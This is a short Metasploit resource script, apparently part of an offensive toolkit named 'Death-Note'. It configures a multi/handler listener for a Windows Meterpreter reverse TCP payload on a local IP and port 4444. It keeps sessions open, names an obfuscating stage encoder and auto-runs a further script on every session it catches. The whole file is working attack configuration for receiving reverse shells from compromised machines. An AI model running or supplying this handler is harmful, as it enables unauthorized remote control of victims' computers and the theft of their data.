use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
set ExitOnSession false
set EnableUnicodeEncoding false
set EnableStageEncoding false
set StageEncoder x86/shikata_ga_nai
set AutoRunScript multi_console_command -r /root/Desktop/github/Death-Note/Modules/Metasploit/auto-script.rc
exploit -j -z
